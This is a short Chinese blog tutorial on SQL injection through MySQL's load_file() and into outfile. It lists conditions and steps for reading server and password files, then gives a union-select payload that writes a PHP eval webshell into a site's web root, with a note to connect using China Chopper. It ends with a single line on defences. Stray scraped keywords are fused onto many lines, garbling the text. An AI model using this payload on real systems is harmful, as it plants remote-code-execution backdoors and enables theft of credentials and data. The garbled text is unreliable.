web安全之sqlload_file()和into outfile()
load_file()php
条件:要有file_priv权限mysql
知道文件的绝对路径web
能使用unionsql
对web目录有读权限数据库
若是过滤啦单引号,则能够将函数中的字符进行hex编码网络
步骤:函数
1.读/etc/init.d下的东西,这里有配置文件路径。网站
2.获得web的安装路径编码
3.读取密码文件spa
into outfile
条件:
1。要有file_priv权限
2.知道网站的绝对路径
3.对web有写的权限
4.没有过滤单引号
步骤:
直到网站的绝对路径的时候:
?id=1 union select "<?php @eval($_POST['c']); ?>" into
outfile("网站根目录")
至关于:
use test; 选择数据库为test
create table aaa(bbb varchar(64)); 在数据库中建立一个表aaa
insert into aaa values("<?php @eval($_POST['c']);?>"); 在aaa中插入一条数据<?php @eval($_POST['c']);?> select * from aaa into outfile 'C:/phpStudy/WWW/a.php'; 将aaa中的数据导出到文件a.php
drop aaa; //删除创建的表
用菜刀练接;
防护: 数据库链接账号不能用root权限 php关闭报错模式 mysql账号没有对权限对网络根目录有写的权限
相关文章
- 1. sql注入之文件写入into outfile
- 2. MySQL逻辑备份into outfile
- 3. MySQL select into outfile用法
- 4. Mysql select into outfile 命令
- 5. MySQL into outfile secure-file-priv
- 6. Mysql 使用 select into outfile
- 7. select into outfile access deny问题
- 8. SELECT ... INTO OUTFILE中面临的secure_file_priv问题
- 9. sqli-labs Less-21 POST-Dump into outfile-String
- 10. 使用sql语句导出excel INTO OUTFILE
- 更多相关文章...
- • ASP.NET MVC - 安全 - ASP.NET 教程
- • MySQL数据库备份(INTO OUTFILE) - MySQL教程
- • Composer 安装与使用
- • Tomcat学习笔记(史上最全tomcat学习笔记)
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
欢迎关注本站公众号,获取更多信息
相关文章
- 1. sql注入之文件写入into outfile
- 2. MySQL逻辑备份into outfile
- 3. MySQL select into outfile用法
- 4. Mysql select into outfile 命令
- 5. MySQL into outfile secure-file-priv
- 6. Mysql 使用 select into outfile
- 7. select into outfile access deny问题
- 8. SELECT ... INTO OUTFILE中面临的secure_file_priv问题
- 9. sqli-labs Less-21 POST-Dump into outfile-String
- 10. 使用sql语句导出excel INTO OUTFILE